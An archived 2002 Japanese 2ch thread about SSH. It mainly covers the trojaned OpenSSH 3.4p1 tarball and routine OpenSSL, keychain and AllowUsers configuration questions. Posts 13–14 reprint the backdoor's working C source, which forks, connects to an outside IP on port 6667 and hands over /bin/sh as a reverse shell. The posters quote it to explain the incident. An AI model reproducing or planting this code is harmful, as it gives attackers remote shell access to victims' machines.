SSH その2

1 名前:名無しさん@Emacs 投稿日:02/08/01 08:23
SSH に関する情報を扱います。
前スレ: http://pc.2ch.net/test/read.cgi/unix/976497035/

2 名前:名無しさん@Emacs 投稿日:02/08/01 08:24
関連リンク集(前スレより)
本家SSH: http://www.ssh.com/
(日本語) http://www.ipsec.co.jp/products/ssh/
OpenSSH: http://www.openssh.com/ja/
OpenSSH 情報: http://www.unixuser.org/~haruyama/security/openssh/
OpenSSH マニュアル: http://www.unixuser.org/~euske/doc/openssh/jman/
PuTTY: http://www.chiark.greenend.org.uk/~sgtatham/putty/
(PuTTY日本語版): http://hp.vector.co.jp/authors/VA024651/
(PuTTYスレ) http://pc.2ch.net/test/read.cgi/unix/1014702733/l50
TTSSH: http://www.zip.com.au/~roca/ttssh.html
MacSSH: http://www.macssh.com/
WideのSSH解説: http://www.soi.wide.ad.jp/class/20000009/slides/12/
IETF SecSH Protocol: http://www.ietf.org/html.charters/secsh-charter.html
SSH FAQ: http://www-vacia.media.is.tohoku.ac.jp/~s-yamane/FAQ/ssh/ssh-faq.html
PortForwarder: http://portforwarder.nttsoft.net/JP/
VNC on SSH: http://www.uk.research.att.com/vnc/faq.html
Tramp: http://ls6-www.informatik.uni-dortmund.de/~grossjoh/emacs/tramp_ja.html
おまけ・Theoのキチガイぶり: http://pc.2ch.net/test/read.cgi/unix/1023635938/546-550


3 名前: メール:sage 投稿日:02/08/01 12:44
ついでにコレも:
(TTSSH日本語版): http://www.sakurachan.org/soft/teraterm-j/ttssh/

4 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/01 17:22
portable版3.4p1にトロイの木馬ですか。。((;゚д゚))ガクガクブルブル

5 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/01 17:27
>>4
某サーバの6667につないで/bin/shしてるよーな、そんな感じ。
<トロイ


6 名前:通行人さん@無名タレント メール:sage 投稿日:02/08/01 17:33
>>4
詳細&ソースぷりーず

7 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/01 17:36
>>6
だいじょぶなやつ
837668 bytes
MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8

ダメなやつ
840574 bytes
MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57



8 名前:名無しさん@お腹いっぱい。 投稿日:02/08/01 17:37
せっかくだからageときましょ

9 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/01 17:41
>>7
ダメなやつってopenssh.comが配布してたの?
それともmirrorのふりしてニセモノつかませてたサイトがあったとか?

10 名前:名無しさん@お腹いっぱい。 投稿日:02/08/01 17:42
>>9
さっき、マスターサイトから取得したら、ダメファイルだたよ…。
おそらく出回ってるミラーも、現在は危険でしょう。


11 名前:名無しさん@お腹いっぱい。 投稿日:02/08/01 17:53
いつごろからダメファイル設置されていたんでしょう?

12 名前:名無しさん@お腹いっぱい。 投稿日:02/08/01 17:53
http://docs.freebsd.org/cgi/getmsg.cgi?fetch=394609+0+current/freebsd-security

13 名前:名無しさん@お腹いっぱい。 投稿日:02/08/01 17:57
参考までに、ビルド時に生成されて実行されるコード:

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <errno.h>
#include <signal.h>
#include <setjmp.h>
jmp_buf env;
int s;
char *i_val = "\x2f\x62\x69\x6e\x2f\x73\x68";
void sig(int sig){
close(s);
sleep(3600);
longjmp(env, 0);
} int main() {
int x;
char c, *a[2];
struct sockaddr_in sa;
struct sigaction act;
switch (fork()) {
case 0:
break;
default:
exit(0);
} close(0);
close(1);
close(2);
memset(&act, 0, sizeof(act));
act.sa_handler = sig;
sigaction(SIGALRM, &act, NULL);


14 名前:名無しさん@お腹いっぱい。 投稿日:02/08/01 17:57
do {
setjmp(env);
if ((s = socket(AF_INET, SOCK_STREAM, 0)) == (-1))
exit(1);
memset(&sa, 0, sizeof(sa));
sa.sin_family = AF_INET;
sa.sin_port = htons(6667);
sa.sin_addr.s_addr = inet_addr("203.62.158.32");
alarm(10);
if (connect(s, (struct sockaddr *) & sa, sizeof(sa)) == (-1))
exit(1);
if ((x = read(s, &c, 1)) == (-1)) {
exit(1);
} else if (x == 1) {
switch (c) {
case 'A':
exit(0);
case 'D':
alarm(0);
dup2(s, 0);
dup2(s, 1);
dup2(s, 2);
a[0] = i_val;
a[1] = NULL;
execve(a[0], a, NULL);
break;
case 'M':
alarm(0);
sig(0);
break;
default:
}
} else {
exit(0);
}
} while (1);
}


15 名前:名無しさん@お腹いっぱい。 投稿日:02/08/01 17:57
i_val はすなわち "/bin/sh" ね。

16 名前:名無しさん@お腹いっぱい。 投稿日:02/08/01 18:45
ftp.u-aizu.ac.jp でダメファイルを確保しますた。
Ring はどうよ?

17 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/01 19:15
ring は OpenSSH のミラーしてないみたい。
うちでは /usr/ports/distfiles/ にだいじょうぶなやつがあったんで、
ftp://ftp.freebsd.org/pub/FreeBSD/ports/distfiles/ を調べたが、
ftp> dir openssh*
150 Opening ASCII mode data connection for '/bin/ls'.
-rw-r--r-- 1 1006 1006 330665 May 1 2001 openssh-2.9.tgz
-rw-r--r-- 1 1006 1006 662590 Jun 17 2001 openssh-2.9p2.tar.gz
-rw-r--r-- 1 1006 1006 363849 Nov 14 2001 openssh-3.0.1.tgz
-rw-r--r-- 1 1006 1006 780980 Nov 15 2001 openssh-3.0.1p1.tar.gz
-rw-r--r-- 1 1006 1006 364230 Mar 29 04:51 openssh-3.0.2.tgz
-rw-r--r-- 1 1006 1006 781092 Mar 29 04:51 openssh-3.0.2p1.tar.gz
-rw-r--r-- 1 1006 1006 9071 May 10 06:47 openssh-3.1-adv.token.patch
-rw-r--r-- 1 1006 1006 367903 Mar 6 00:43 openssh-3.1.tgz
-rw-r--r-- 1 1006 1006 9203 May 10 06:47 openssh-3.1p1-adv.token.patch
-rw-r--r-- 1 1006 1006 803104 Mar 7 02:41 openssh-3.1p1.tar.gz
226 Transfer complete.
残念、まだミラーされてなかった模様。

18 名前:名無しさん@お腹いっぱい。 投稿日:02/08/01 19:30
ftp://ftp.ring.gr.jp/pub/OpenBSD/OpenSSH/portable/

ここのは正常だったよ。

19 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/01 19:31
ring でも /pub/OpenBSD/OpenSSH/portable/ にあると思いますが、
毒入りかどうかは未確認(たぶんまだかな)。
すでに毒がまわっている OpenBSD のミラーもいくつかあるようです。

20 名前:16 メール:sage 投稿日:02/08/01 19:35
ftp.u-aizu.ac.jp には大丈夫な奴とダメな奴の
両方があるみたいだね。ダメファイルは多分

/pub/net/security/ssh/openssh/portable

の方。

21 名前:名無しさん@カラアゲうまうま メール:sage 投稿日:02/08/01 19:42
>>12
これはOpenBSDでコンパイルするときがヤバイってこと?

22 名前:名無しさん@お腹いっぱい。 投稿日:02/08/01 19:46
see http://www.mavetju.org/weblog/weblog.php

23 名前:名無さん@腹へった メール:sage 投稿日:02/08/01 20:26
>>19
いくつかの Ring サーバで /pub/OpenBSD/OpenSSH/portable のを
調べたけど大丈夫だった


24 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/01 20:37
Ring サーバって OpenBSD 自体が無いところもいくつかあるね。
近い ring.ocn.ad.jp には無かったよ。(´・ω・`)ショボーン

25 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/01 20:56
bf-test.cそのものは単にソース吐いてるだけか...


26 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/02 01:00
で,この原因はftp.openbsd.orgがcrackされたということなの?

27 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/02 01:13
>>26
実は Theo たんが…

28 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/02 01:19
おまいらportable版なぞ使わずOpenBSDを使え! っすか? (((;゚Д゚))ガクガクブルブル

29 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/02 01:24
>>26

たぶんそう。
てことは、ssh だけじゃなくて、OpenBSD 本体の方も、書換えが
行なわれてないか調べる必要があるわけだが...

30 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/02 01:35
こういう時って、ftp.openbsd.orgの中身は全て信頼できないものと見なさな
いと危険だよね。
CVSリポジトリはTheoの手元にあるみたいだから大丈夫かな。


31 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/02 03:05
misc@に流れたAdvisoryのapplication/pgp-signatureがdemimeされていてちょっとワラタ

32 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/02 04:18
> CVSリポジトリはTheoの手元にあるみたいだから大丈夫かな。

その筈なんだが、もし ftp.openbsd.org で root も盗られていて、しかも
ftp.openbsd.org と cvs.openbsd.org で共通にアカウントを持つ人間がいた
りすると、結構やばい。
この前の monkey.org の件でも、同じ心配があるな。

33 名前:. メール:sage 投稿日:02/08/02 10:38
OpenBSDは、どうなってしまうんだろう。。。

34 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/02 11:04
別にどうもならん。

35 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/02 12:12
>>33
セキュリティが唯一の取り柄のOSだったのに、
マトモな人なら使うの止めるだろうなぁ。


36 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/02 12:22
誰かまぬけな俺に教えてくれ。 どうして ftp.openbsd.orgは > 220 merlin FTP server (SunOS 4.1) ready. なのですか? ひょとして、トロイ埋め込まれたのはOpenBSDのせいじゃないんじゃ?

37 名前:36 メール:sage 投稿日:02/08/02 12:23
あれ?
改行が通らねえ…見苦しくてスマソ。

38 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/02 12:31
>>36
http://www.openbsd.org/faq/faq8.html#wwwsolaris

39 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/02 15:25
いよいよdjbsshの出番d(略

40 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/02 15:32
Theoがなにも考えずに3.4にあげろっていってたのはこのためか。

41 名前:名無しさん@お腹いっぱい。 投稿日:02/08/02 15:48
危険なのでage

42 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/02 16:58
         Theoワッショイ!!
     \\  Theoワッショイ!! //
 +   + \\ Theoワッショイ!!/+
         S    S    H     +
.   +   /□\  /□\  /□\  +
      ( ´∀`∩(´∀`∩)( ´ー` )
 +  (( (つ   ノ(つ  丿(つ  つ ))  +
       ヽ  ( ノ ( ヽノ  ) ) )
       (_)し' し(_) (_)_)


43 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/02 17:51
毒を仕込んだの、実はTheo

44 名前:名無しさん@お腹いっぱい。 投稿日:02/08/02 19:14
>39 マヂであったら欲しい。

45 名前:名無しさん@お腹いっぱい。 投稿日:02/08/02 19:16
問題のweb.snsonline.net って、何奴?

46 名前:名無しさん@カラアゲうまうま メール:sage 投稿日:02/08/02 19:32
単なるホスティングサービスだろう。
今は動いてないようだが、たぶん不要なircdが動いてるのを利用されたんだろう。

47 名前:名無しさん@サンマうまうま メール:sage 投稿日:02/08/02 22:17
Theo尊師祭りのところすみません。
OpenSSLを上げたら
debug1: ssh_dss_verify: signature incorrect
と出てpublickey認証が通らなくなっちゃったんですが、何かご存知の方おしえてください。
よろしくおながいします。

48 名前:名無しさん@お酒のみすぎ メール:sage 投稿日:02/08/03 01:10
自己レスすんません、gcc-2.95.2.1で-funroll-all-loopsつけるとダメだったみたいです、 make testも通りませんでした。-funroll-all-loopsを外したら通りました。

49 名前:名無しさん@カラアゲまうまう 投稿日:02/08/03 01:10
cvs.openbsd.org が疑われているようです…

50 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/03 16:44
げげ〜。cvs リポジトリ全体が信頼できないとなると、OpenSSH だけじゃなく
OpenBSD 全体がかな〜りやばいことにならんか?

51 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/03 21:30
もうだめぽ

52 名前:名無しさん@お腹いっぱい。 投稿日:02/08/04 14:41
OpenSSHがんばってくりっちょ!

53 名前:名無しさん@お腹いっぱい。 投稿日:02/08/04 15:16
Solaris9についてる
Sun SSHってどーよ?
一応OpenSSHベースらしいが、
どのくらい違うのでしょう。

54 名前:名無しさん@お腹いっぱい。 投稿日:02/08/04 21:11
O p e n B S D 落 日 の 日 迫 る! ! !

55 名前:名無しさん@お腹いっぱい。 投稿日:02/08/04 21:13
>>53
俺も普段 Solaris 使ってないから分からないけど、
心配なら本家から porting されてる OpenSSH 使えば?


56 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/04 22:37
>>54
マジだとしてマジレスするとちょっと残念だな。

57 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/04 23:53
今回の件は、べつにOpenBSD自体の脆弱性が呈されたわけでもなんでもないでしょう。

ところで前から気になってたんだけど、おなじディレクトリに .md5置いとくのって、
あんまり意味ないよね。(それとも、crack対策じゃなくて、ファイルが壊れてないかどうかの検証用なのかな?)


58 名前:初期不良 メール:sage 投稿日:02/08/05 01:29
ftp.openbsd.org anonymous ログインできないでつ...

59 名前:名無しさん@お腹いっぱい。 投稿日:02/08/05 07:43
>>57
OpenBSD「プロジェクト」の脆弱性ははっきりしたのは確か

60 名前:57 メール:sage 投稿日:02/08/05 07:51
>>59
そういう考え方もあったかー。

でも、問題のsunsiteなんとか切れば、というか使うのやめたらそれで
おしまいな話なんじゃないの?

61 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/05 12:08
>>60
monkey.org の方は openbsd 使ってたんじゃないの?



62 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/05 20:23
>>61
それって単にミラーリングで伝播しただけってのとは違うの?

(といっても、monkey.orgってのがどんな代物かも知らないのですが...詳細きぼん。)

63 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/05 22:05
> それって単にミラーリングで伝播しただけってのとは違うの?

sshの件とは関係ない。

> 詳細きぼん

bugtraq と monkey.org を指定して google で探すと、最初に出てくるぞ。
monkey.org は、OpenBSD の committer がやっているサイトね。

64 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/05 23:47
しまった、保存する前に前スレがdat落ちしてしまったよ…ウワァァン
誰か前スレ保存している方いらっしゃいませんか?

65 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/06 01:26
途中までなら
http://www.google.co.jp/search?q=cache:hihesdfKKgsC:pc.2ch.net/test/read.cgi/unix/976497035/+&hl=ja&ie=UTF-8

66 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/06 03:22
http://www.42ch.net/UploaderSmall/source/1028571690.dat
bzip2でし

67 名前:64 メール:sage 投稿日:02/08/06 05:47
>>65
ありがとうございます。…しかし、見たい部分はさらに後の方にあるようです…

>>66
おおおおおー!拡張子をbz2に変更して解凍したら見ることができました。
# 「不完全な」HTMLファイルといったカンジですな

68 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/06 06:30
>67
http://www.skipup.com/~niwatori/index3.htm#dat

69 名前:名無しさん@Emacs メール:sage 投稿日:02/08/06 22:44
いまさらだけど、

http://130.158.36.68/~pooh/ssh.html

70 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/07 00:24
で、春山さんのトコに過去ログHTML置いてくれると嬉かったり…。

71 名前:64=67 メール:sage 投稿日:02/08/07 03:31
>>68
えぇ、知っております。しかしID登録する気はないので(苦笑)、>>64を書いたので
した。

>>70
同意です!!

72 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/07 08:03
読めないdat落ちスレのミラー作ります
http://ton.2ch.net/test/read.cgi/gline/1026576001/

73 名前:春山征吾 ◆9Ggg6xsM メール:sage 投稿日:02/08/07 12:23
http://www.unixuser.org/%7Eharuyama/security/openssh/dat/pc.2ch.net_80__unix_dat_976497035.html

http://www.moonwolf.com/ruby/のdat2html.rbで変換したものを置きました。


74 名前:名無しさん@お腹いっぱい。 投稿日:02/08/07 21:41
OpenSSH は theo と OpenBSD とともに入滅の時を待っています。

75 名前:名無しさん@カラアゲうまうま メール:sage 投稿日:02/08/07 22:30
OpenSSHが死んだらつぎはFreSSHかねえ

76 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/07 22:55
>>75
意味わかんね。

77 名前:70 メール:sage 投稿日:02/08/07 23:10
>>73
春山さん、ありがとうございます!!(m__m)


78 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/07 23:59
>>76
ttp://www.fressh.org

79 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/08 02:57
>>78
あ、そういうのがあるんね。無知でスマソ。

80 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/12 05:09
>>57
md5って壊れてないかどうかのチェック用で、
crack対策はPGPやGPGの署名を使えばいいんじゃない?

81 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/12 11:26
>>80
まあパッケージ一つ一つを署名するのは面倒な作業だと思うけど、
sshとかのセキュリティ関係のプログラムだけ署名するなら現実的ですね。
今度は「この署名は正しいようだが、これを署名した人間は本当に
信用出来るのか?」という問題が出てくるから、それなりの人物の署名でないと
意味が無いので…

82 名前:login:Penguin メール:login:Penguin 投稿日:02/08/12 11:39
opensslが0.9.6gになってるんだけど、ちゃんとopensshもmakeしなおしましたか?

83 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/12 13:23
>>82
し直さないとダメなんでしょうか? ダメなんですよね、きっと。
その場合って、openssh を make distclean とかする必要あります?

84 名前:名無しさん@お腹いっぱい。 投稿日:02/08/12 13:25
>>82
漏れは openssl を shared でコンパイルしてるから、ssh は
再起動しただけですが何か?
ssh -V
OpenSSH_3.4p1, SSH protocols 1.5/2.0, OpenSSL 0x0090607f


85 名前:login:Penguin メール:login:Penguin 投稿日:02/08/12 15:40
ldd /usr/sbin/sshd
してみたら、たしかにsharedでリンクされてるんだけど、
libcrypto.so.3 => /usr/lib/libcrypto.so.3 (0x280d0000)
これで,
ls -al /usr/lib/libcrypto.so.3
で見てみると古いライブラリなんですよね。
あたらしいやつは
/usr/lib/libcrypto.so.2
みたい。やっぱりmakeしなおしですか?
一応再起動してみたけど、
/usr/lib/libcrypto.so.3
にリンクされてたもんで・・・


86 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/12 16:11
>>85
犬板とクロスポストかよ おめでてえな

87 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/12 16:56
>>85
libcrypto.so.3 がライブラリの実体なんですか?
別のファイルのシンボリックリンクだったりしません?
私の所では、libcrypto.so.0.9.5a のリンクで、
そちらのタイムスタンプはアップデート後のものになってました。

88 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/12 17:30
libcrypto.so.3 はライブラリの実体でした。
libcrypto.soはlibcrypto.so.2にシンボリックリンクになってます。
きっとopensslをmakeする前はlibcrypto.soはlibcrypto.so.3にシンボリックリンクされてたんだと思います。

OpenSSHをmakeするときに、libcrypto.soにリンクしてくれればいいのに。。。

89 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/12 21:47
elfのmajorの話と混同してないか?

90 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/12 21:59
openssl 0.9.6c を make install している最中に sshd が落ちた…。
openssl の Makefile は libcrypto.so.0.9.6 を上書きしちまうのか?
また 0.9.6e でも同じことをせんように気をつけねば。

91 名前:sage 投稿日:02/08/12 22:52
0.9.6e じゃなくて、0.9.6gにしとけ >> 90

92 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/12 23:00
堅い方法だと、singleに落としてmake installするしかないのかな

93 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/12 23:05
このへんの正しいインストール手順きぼんぬ。

94 名前:名無しさん@お腹いっぱい。 投稿日:02/08/12 23:05
>>90 上書きしてくれなきゃバージョンアップの意味ないのでわ? ちなみに、shared を置き換えて daemon が落ちるのはごく普通。

95 名前:名無しさん@お腹いっぱい。 投稿日:02/08/13 00:47
FreeBSDだとlibcrypto.so.2 で、Solarisだとlibcrypto.so.0.9.6 になってるなぜ?

96 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/13 01:40
>>92
network 経由じゃそれをやるのは不可能に近いからねぇ。それをやろうとすると
Terminal server を用意して…とかいうことになる。

>>94
一番悪いのは version number の持つ意味をなかば無視して 0.9.6 のまま固定
しちゃっていることだけど、Makefile のほうも古い library を mv して
mv libcrypt.so.0.9.6 libcrypt.so.0.9.6-old してから新規 library を
libcrypt.so.0.9.6 として install してくれれば、とりあえず被害はある程度は
収まる。

97 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/13 03:12
openssl の config や Makefile ってかなり腐っているな…。
config --prefix=/usr/local --openssldir=/usr/local/ssl ってやっても
意図通りに install されないんで Makefile 見たら萎えた。

とっとと autoconf に移行しろよ…。

98 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/13 03:39
>>97
まずあり得ないと思われ

autoconfってGPL/LGPL縛りあるんでない?

99 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/13 03:50
>>98
configureやconfig.*のコメント見てみ。縛りは無いYO。

100 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/13 12:23

 ┌─────────┐
 │               .|
 │  100get   │
 │               .|
 └―――──――――┘
      ヽ(´ー`)ノ
         (  へ)
          く


101 名前:名無しさん@Emacs 投稿日:02/08/13 21:57
FreeBSDを今日のSTABLEにしたらKeyChainが動かなくなってしまいった。
一週間前にSTABLEでは大丈夫だった。
portsからインストールした1.9
起動時にこんなエラーが。

/usr/local/bin/keychain: 244: Syntax error: "||" unexpected

OpenSSL関係かな?

102 名前:名無しさん@お腹いっぱい。 投稿日:02/08/13 22:01
>>101
OpenSSHそのものとは無関係

/bin/shでの文法の解釈が微妙に変わった副作用だな

詳しくはこのへん参照
http://pc.2ch.net/test/read.cgi/unix/1028052350/211

103 名前:101 メール:sage 投稿日:02/08/13 22:29
>>102
そうですか。
KeyChain側で対応すべき問題なのかな?

104 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/14 03:06
>>101
http://www.freebsd.org/cgi/query-pr.cgi?pr=40386

105 名前:名無しさん@XEmacs メール:sage 投稿日:02/08/14 10:20
♯お約束?

>>103
> KeyChain側で対応すべき問題なのかな?

だからどうして keychain なぞを使わにゃならんのかと小一時間…


106 名前:101 メール:sage 投稿日:02/08/14 11:47
>>105
自分が自宅で使うマシンで、keychainが便利だから。


107 名前:104 メール:sage 投稿日:02/08/15 03:10
>>101
http://docs.freebsd.org/cgi/getmsg.cgi?fetch=2169031+0+archive/2002/cvs-all/20020811.cvs-all
まで辿り着けたのでせうか。

108 名前:FreeBSD質問スレの206=211 メール:sage 投稿日:02/08/15 03:41
>>107
あら、/bin/sh側に修正入ったのね。
17日にMFCかかったらCVSupするか…。

109 名前:名無しさん@お腹いっぱい。 投稿日:02/08/16 06:22
freebsd4.5Rを使ってますがsshd_configで
AllowUsers user1 user2
特定のユーザであり特定のip addrからのみssh接続許可したいのですが
どうすれば良いのでしょうか?

110 名前:名無しさん@お腹いっぱい。 投稿日:02/08/16 09:22
>109
tcpd


111 名前:名無しさん@XEmacs メール:sage 投稿日:02/08/16 10:11
>>109
> freebsd4.5Rを使ってますがsshd_configで
> AllowUsers user1 user2
> 特定のユーザであり特定のip addrからのみssh接続許可したいのですが
> どうすれば良いのでしょうか?

AllowUsers を知っていながらこういう質問が出るってことは OpenSSH
2.9p1 辺り?

3.Xp に上げれば

AllowUsers user1@ip1 user2@ip2

で逝けるだろう。


112 名前:名無しさん@お腹いっぱい。 投稿日:02/08/16 17:09
>>109
PasswordAuthentication no にして、鍵認証だけを
許可するって方法もあるです。AllowUsers の方が
楽だけど。


113 名前:109ではないけど メール:sage 投稿日:02/08/16 17:35
>>111
初めて知ったっ!ありがとうございます!

> 3.Xp に上げれば
>
> AllowUsers user1@ip1 user2@ip2
>
> で逝けるだろう。

うーん、アナウンスメールでの変更内容見てもこれに関する記述はなかった
なぁ…。

ChangeLog見てみるかな…。

114 名前:113 メール:sage 投稿日:02/08/16 17:40
あー、ちなみに、3.0.2p1にはその機能はなかったですね(3.0.2までのChangeLogは
読んだ)。ということは3.1以降ですね。


量が多くて大変だが見てみっか!ゴルァァァァ

115 名前:名無しさん@XEmacs メール:sage 投稿日:02/08/16 20:39
>>114
> あー、ちなみに、3.0.2p1にはその機能はなかったですね(3.0.2までのChangeLogは
> 読んだ)。ということは3.1以降ですね。

あー、そーなんだー。手元には 2.9 と 3.1 以降しかなかったんで気
付かず 3.X ってかいちまったっす。

> 量が多くて大変だが見てみっか!ゴルァァァァ

ChangeLog より、直截的に auth.c の allowd_user() 辺りを 2.9 と
3.[1-4] とで見比べてみる方が早道。


116 名前:名無しさん@XEmacs メール:sage 投稿日:02/08/16 20:44
> ChangeLog より、直截的に auth.c の allowd_user() 辺りを 2.9 と

もちろん、

< ChangeLog より、直截的に auth.c の allowed_user() 辺りを 2.9 と

ね。

♯いかん、最近この手のミスが多いな。

あと match.c と。


117 名前:113=114 メール:sage 投稿日:02/08/17 00:02
レスどうもです。

>>115
>>116
 アドバイスありがとうございます。見てみます。

# 最初>>116でおっしゃっている意味がさっぱり分からなかったんですが、今
# もう一回見たらやっと分かった…allowd_user()ではなく、allow*e*d_user()
# なわけですね。

ちなみに、3.0.2p1のマニュアルにはこういった記述はないですが、3.4p1のマニュアル
(日本語訳はhttp://www.unixuser.org/~euske/doc/openssh/jman/sshd_config.html参照)
にはバッチリ書かれてますね。

118 名前:名無しさん@お腹いっぱい。 投稿日:02/08/17 04:38
opensshを最新にしたらps ax
sshd: user [priv] (sshd)
sshd: user@ttyp0 (sshd)
でこうなるんですがこれで正常なんですよね?

119 名前:113=114 メール:sage 投稿日:02/08/17 10:14
ChangeLogをざっと眺めてみたけど、これだ!というのが見つからなかったです…。
それらしきものは以下の部分かなぁ…。

20020304
 - OpenBSD CVS Sync
   - stevesk@cvs.openbsd.org 2002/02/28 19:36:28
   [auth.c match.c match.h]
   delay hostname lookup until we see a ``@'' in DenyUsers and AllowUsers
   for sshd -u0; ok markus@
   - stevesk@cvs.openbsd.org 2002/02/28 20:36:42
   [sshd.8]
   DenyUsers allows user@host pattern also


で、3.1p1のsshd.8を見てみたら件のUSER@HOSTに関する説明が追加されているのを
確認しますた。sshd.8のAllowUsersオプションに関する部分より:
all users. If the pattern takes the form USER@HOST
then USER and HOST are separately checked, restricting
logins to particular users from particular hosts.

120 名前:113=114=119 メール:sage 投稿日:02/08/17 11:13
さらに、>>115>>116で述べられていたソースコードを見てみますた…ざっと見
たところ、最終的にはmatch.cのmatch_user()関数に行き着くようですね。で、この
関数は2.9p2→2.9.9p2で追加されたようです。
 2.9p2: RCSID("$OpenBSD: match.c,v 1.12 2001/03/10 17:51:04 markus Exp $");
2.9.9p2: RCSID("$OpenBSD: match.c,v 1.14 2001/06/27 04:48:53 markus Exp $");

…で、2.9.9p2の配布ファイルのChangeLogを見てみると、該当個所ハケーン:
20010704
 - OpenBSD CVS Sync
  - markus@cvs.openbsd.org 2001/06/27 04:48:53
   [auth.c match.c sshd.8]
   tridge@samba.org

んなの分かるかヴォケェェェ!!!!!!きちんと説明書けやゴルァァァ!

121 名前:113=114=119=120 メール:sage 投稿日:02/08/17 11:36
結論:
機能そのものは2.9p2→2.9.9p2で追加され、マニュアルでの記述は3.0.2p1→3.1p1で
追加された。

122 名前:名無しさん@XEmacs メール:sage 投稿日:02/08/17 17:19
>>120
> さらに、>>115>>116で述べられていたソースコードを見てみますた…

乙渇れー。

> んなの分かるかヴォケェェェ!!!!!!きちんと説明書けやゴルァァァ!

つーこって、“Use the source, Luke”なんだ罠、やっぱ。


123 名前:名無しさん@XEmacs メール:sage 投稿日:02/08/17 17:27
>>118
ttp://www.unixuser.org/~haruyama/security/openssh/README.privsep_nihongo.txt

124 名前:120=121 メール:sage 投稿日:02/08/18 07:50
>>122
いちおう、自分なりにやってみたわけですが、分析結果は正しいですよね?>>122
んをはじめ、他の人のアドバイスきぼんぬ。

あと、話の腰を折る気は全くないんですが(本当ですっっ)、“Use the source, Luke”
って何なんですか?元ネタはopenssh-unix-dev?

125 名前:名無しさん@カラアゲうまうま メール:sage 投稿日:02/08/18 07:57
s/source/force/
Luke = Skywalker

126 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/18 10:07
May the source be with you.

127 名前:名無しさん@XEmacs メール:sage 投稿日:02/08/18 10:47
>>124
> いちおう、自分なりにやってみたわけですが、分析結果は正しいですよね?>>122
> んをはじめ、他の人のアドバイスきぼんぬ。

正しいっす。

たしかに 2.9.9 から allowed_users() が match_pattern() を直接
じゃなくて match_user() を引数に hostname と ipaddr を追加し
た上で呼び出すようになり、match_user() のなかで user を '@'
で分割した上で前者を match_pattern()、後者を match_host_and_ip()
でそれぞれマッチするかどうかチェックするようになってますね。

実際に試しちゃいないけど、このコードなら 3.4 の man page に書
いてあるのと同じ動作をする筈。

ただ、開発者でもなんでもないおいらの話はもとより、開発者本人
のにしろその言を信じるってのは、『1 (ヵ月|週間|日|時間|分|秒)
前の自分は他人』の法則に則る限りお奨めできない。

ドキュメントや開発者本人がなんと言おうと、プログラムはソース
に書かれている通りにしか動きまへん。コードと自分の目を信じま
せう。

で、“Use the source, Luke”に関してはすでにいくつかフォローが
あるけど、このフレーズでぐぐってみればいろいろ当たるっす。なか
でも

ttp://burks.brighton.ac.uk/burks/foldoc/61/122.htm

辺りの説明が的確かしらん。

128 名前:名無しさん@カラアゲうまうま メール:sage 投稿日:02/08/18 11:17
